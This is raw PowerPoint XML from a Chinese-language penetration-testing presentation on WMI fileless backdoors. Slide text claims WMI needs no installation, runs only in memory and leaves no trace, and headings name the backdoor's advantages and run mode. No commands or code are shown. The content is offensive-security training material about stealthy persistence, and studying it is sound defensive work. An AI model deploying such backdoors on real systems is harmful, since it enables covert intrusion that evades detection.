        <p:spPr>
          <a:xfrm>
            <a:off x="501977" y="2289420"/>
            <a:ext cx="8140045" cy="362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我们可以把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当作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系统进行相互交流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WMI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在渗透测试中的价值在于它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不需要下载和安装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因为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系统自带功能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且整个运行过程都在计算机内存中发生，不会留下任何痕迹</a:t>
            </a:r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95271-7B98-4919-9166-7DBE85AC1A1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1717730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(3)WMI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无文件后门的优势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34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B39149-0EBF-4BA0-B5FA-8FA590579155}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1609490" y="2551837"/>
            <a:ext cx="5925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0x01</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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WMI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后门运行模式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18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AC3548-9B21-472F-A1C7-1287DAD54552}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="114604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0x01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后门运行模式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9466C3-C9D2-4F07-A6B4-70476DE9B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91" y="1546150"/>
            <a:ext cx="6441018" cy="49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970</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)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Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Lucida Console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SAMO</dc:creator>
  <cp:lastModifiedBy>SAMO</cp:lastModifiedBy>
  <cp:revision>42</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-04-22T12:22:45Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-03-26T04:31:19Z</dcterms:modified>
</cp:coreProperties>
</file>